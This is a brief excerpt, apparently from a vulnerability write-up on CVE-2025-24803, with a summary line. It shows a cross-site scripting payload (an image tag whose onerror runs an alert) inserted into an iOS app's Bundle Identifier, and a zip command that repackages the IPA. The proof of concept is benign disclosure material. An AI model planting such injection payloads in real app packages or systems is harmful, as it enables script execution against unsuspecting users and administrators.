
CVE-2025-24803 *Figure 1. Unsanitized bundle* <img src="test" onerror="alert('Hello PT')"> *Figure 2. Example of the modified Bundle Identifier* • Zip the modified IPA file. *Listing 2. ) Zipping the file* ``` zip -r xss.ipa Payload/ ```
Post summary
The post provides a clear proof‑of‑concept demonstrating a cross‑site scripting vulnerability in iOS IPA bundles for CVE‑2025‑24803, but does not detail an exploit tool or note active exploitation.
